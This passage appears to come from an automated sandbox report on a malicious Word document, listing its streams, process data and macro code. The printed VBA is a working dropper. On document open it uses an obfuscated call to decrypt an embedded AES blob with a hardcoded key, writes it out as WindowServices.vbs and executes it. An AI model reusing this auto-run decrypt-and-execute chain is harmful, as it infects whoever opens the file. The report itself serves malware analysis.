            '--- generate RFC 2898 based derived key
            On Error GoTo EH_Unsupported '--- PBKDF2 API missing on Vista
            hResult = BCryptOpenAlgorithmProvider(.hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
            If hResult < 0 Then
                GoTo QH
            End If
            hResult = BCryptDeriveKeyPBKDF2(.hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt),                     KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)
            If hResult < 0 Then
                GoTo QH
            End If
            On Error GoTo 0
        End If
        '--- init AES key from first half of derived key
        On Error GoTo EH_Unsupported '--- CNG API missing on XP
        hResult = BCryptOpenAlgorithmProvider(.hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)
        If hResult < 0 Then
            GoTo QH
        End If
        On Error GoTo 0
        hResult = BCryptGetProperty(.hAesAlg, StrPtr("ObjectLength"), .AesKeyObjLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptSetProperty(.hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)  ' 30 = LenB("ChainingModeECB")
        If hResult < 0 Then
            GoTo QH
        End If
        ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte
        hResult = BCryptGenerateSymmetricKey(.hAesAlg, .hAesKey, .AesKeyObjData(0), .AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        '--- init AES IV from second half of derived key
        Call CopyMemory(.Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)
        '--- init HMAC key from last HashLen bytes of derived key
        hResult = BCryptOpenAlgorithmProvider(.hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptGetProperty(.hHmacAlg, StrPtr("HashDigestLength"), .HashLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptCreateHash(.hHmacAlg, .hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - .HashLen), .HashLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
    End With
    '--- success
    pvCryptoAesCtrInit = True
    Exit Function
QH:
    uCtx.LastError = GetSystemMessage(hResult)
    Exit Function
EH_Unsupported:
    uCtx.LastError = ERR_UNSUPPORTED_ENCR
End Function

Private Sub pvCryptoAesCtrTerminate(uCtx As UcsCryptoContextType)
    With uCtx
        If .hPbkdf2Alg <> 0 Then
            Call BCryptCloseAlgorithmProvider(.

VBA File Name: ViewSession.cls, Stream Size: 11833

General
Stream Path:	Macros/VBA/ViewSession
VBA File Name:	ViewSession.cls
Stream Size:	11833
Data ASCII:	. . . . . . . . . . . . . . . . 8 . . . ! . . . M . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . N . / = 6 C 7 ~ I D . * = h . 8 . . + 3 q . . . . . . . . . . . . . . . . . . . . . . b . M . . i S . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S . . . . . S . . . . . S . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . .
Data Raw:	01 16 03 00 00 00 01 00 00 1a 05 00 00 e4 00 00 00 38 02 00 00 ff ff ff ff 21 05 00 00 4d 1a 00 00 00 00 00 00 01 00 00 00 d4 44 d1 cf 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 4e 1e 2f 3d c2 f3 36 43 b9 37 7e aa 49 44 a4 0d 2a 3d fb fc fa a0 68 10 a7 38 08 00 2b 33 71 b5 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ViewSession"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub ikwiwiejs_19293_Ade()
    Dim key As String
    Dim decryptedText As String
    Dim i As Integer
    Dim parts(1 To 60) As String
    Dim Oekksoioa_ As String
    Dim chunkSize As Integer
    Dim tempFilePath As String

    ' ?t kha AES
    key = "Bnshekao@3123989942"    ' Kha 16 byte cho AES
    part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
    part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
    part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
    part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
    part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
    part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
    part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
    part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
    part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
    part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
    part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
    part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
    part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
    part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
    part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
    part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
    part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
    part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
    part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
    part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
    part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
    part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
    part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
    part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
    Dim encryptedText As String
    encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
    decryptedText = AesDecryptString(encryptedText, key)    ' Gi?i m

    ' Kch thu?c c?a m?i ph?n
    chunkSize = 3000  ' Kch thu?c m?i ph?n
    Dim outputFilePath As String
    ' Luu ton b? n?i dung gi?i m vo t?p VBS
    vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"

    ' Ghi t?ng ph?n ra t?p
    Open vbsFilePath For Output As #1
    For i = 1 To Len(decryptedText) Step chunkSize
        partText = Mid(decryptedText, i, chunkSize)
        Print #1, partText  ' Ghi t?ng ph?n vo t?p
    Next i
    Close #1

    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run """" & vbsFilePath & """", 1, True


End Sub

Private Sub Class_Initialize()
    
End Sub

VBA File Name: ksksksksksksks.cls, Stream Size: 1427

General
Stream Path:	Macros/VBA/ksksksksksksks
VBA File Name:	ksksksksksksks.cls
Stream Size:	1427
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . Y c { A T ` I 7 . W - p L F . . . b . . . . . . . . . . . . . . . . . . . . z r C . . ; . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S " . . . . S . . . . . S " . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . . . . . . . . . .
Data Raw:	01 16 03 00 00 00 01 00 00 b4 03 00 00 e4 00 00 00 12 02 00 00 ff ff ff ff bb 03 00 00 87 04 00 00 00 00 00 00 01 00 00 00 d4 44 a8 d5 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 9f 59 e8 a9 63 fa 7b 41 b8 54 96 60 af 49 ed b2 37 10 57 2d 70 4c ca 46 9f 7f c7 92 11 62 f4 c0 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ksksksksksksks"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Application.OnTime Now + TimeValue("00:00:01"), "CallTestAES"
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.235956365095031
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.2427468033329246
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.4554711108713573
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A D M I N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7157

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	7157
Entropy:	5.868824855770492
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 549

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	549
Entropy:	5.333604417988887
Base64 Encoded:	True
Data ASCII:	I D = " { 5 5 3 1 6 D 2 6 - E A 2 9 - 4 0 0 1 - B 2 5 9 - 4 4 5 9 D 4 5 6 A 1 F E } " . . D o c u m e n t = k s k s k s k s k s k s k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 3 . . C l a s s = V i e w S e s s i o n . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " 1 0 0 7 4 6 3 5 0 " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 B 9 9 3 1 7 D 6 B 8 1 6 B 8 1 6 B 8 1 6 B 8 1 " . . D P
Data Raw:	49 44 3d 22 7b 35 35 33 31 36 44 32 36 2d 45 41 32 39 2d 34 30 30 31 2d 42 32 35 39 2d 34 34 35 39 44 34 35 36 41 31 46 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 43 6c 61 73 73 3d 56 69 65 77 53 65 73 73 69 6f 6e 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131

General
Stream Path:	Macros/PROJECTwm
CLSID:
File Type:	data
Stream Size:	131
Entropy:	3.0376124822172628
Base64 Encoded:	False
Data ASCII:	k s k s k s k s k s k s k s . k . s . k . s . k . s . k . s . k . s . k . s . k . s . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . V i e w S e s s i o n . V . i . e . w . S . e . s . s . i . o . n . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 56 69 65 77 53 65 73 73 69 6f 6e 00 56 00 69 00 65 00 77 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 7577

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	7577
Entropy:	5.650269563862988
Base64 Encoded:	True
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 628

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	data
Stream Size:	628
Entropy:	6.379534074216786
Base64 Encoded:	True
Data ASCII:	. p . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . ? ? = . . . . t . 4 . . . . . . . r i . . . . j < . . . . . . . s t d o l e > . . . s . t . d . o . l . e . . . h . . . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . 0 . . E N o r ( m a l E N C r . m . a F . . . b . . * \\ C . . . . r i . . ! O f f i c g O . f . i . c g . !
Data Raw:	01 70 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 80 3f b4 3f 3d 04 0e 07 02 74 01 34 08 06 12 02 09 02 12 93 ad 72 69 09 00 8a 0c 02 6a 3c 02 0a 16 00 06 00 0e 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 1d 02 5e 00 03 2a 5c 47

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	1.1027496421550893
Base64 Encoded:	False
Data ASCII:	. U . . . . . . . . . . . . . . . . . . . . . 2 . . . . . b j b j n n . . . . . . . . . . . . . . . . . . . . . . . . . . . a . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . .
Data Raw:	ec a5 c1 00 55 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 32 08 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 16:15:25.698946953 CET	1.1.1.1	192.168.2.4	0x1cf0	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:15:25.698946953 CET	1.1.1.1	192.168.2.4	0x1cf0	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: WINWORD.EXEPID: 7480, Parent PID: 752

General

Target ID:	0
Start time:	10:15:13
Start date:	14/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x3f0000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Non-Executed Functions

Subroutine
CallTestAESAPIs: 2, Strings: 1, Number of lines: 6, Relevance: 7.006

APIs	Meta Information
CallByName
VbMethod

Strings	Decrypted Strings
"ikwi""wiejs""_19293_Ade"

Line	Instruction	Meta Information
2	Public Sub CallTestAES()
3	Dim kakensooe as New ViewSession
4	Dim methodName as String
7	methodName = "ikwi" & "wiejs" & "_19293_Ade"
10	CallByName kakensooe, methodName, VbMethod	CallByName VbMethod
11	End Sub

Module: Module3

Declaration

Line	Content
1	Attribute VB_Name = "Module3"
3	Option Explicit
4	DefObj A-Z
12	#if Win64 then
13	Private Const PTR_SIZE as Long = 8
14	#else
15	Private Const PTR_SIZE as Long = 4
16	#endif
18	#if HasPtrSafe then
19	Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory"(lpvDest as Any, lpvSource as Any, ByVal cbCopy as LongPtr)
20	Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr"(Ptr() as Any) as LongPtr
21	Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong as Long) as Long
22	Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036"(RandomBuffer as Any, ByVal RandomBufferLength as Long) as Long
24	Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm as LongPtr, ByVal pszAlgId as LongPtr, ByVal pszImplementation as LongPtr, ByVal dwFlags as Long) as Long
25	Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm as LongPtr, ByVal dwFlags as Long) as Long
26	Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, pbOutput as Any, ByVal cbOutput as Long, cbResult as Long, ByVal dwFlags as Long) as Long
27	Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, ByVal pbInput as LongPtr, ByVal cbInput as Long, ByVal dwFlags as Long) as Long
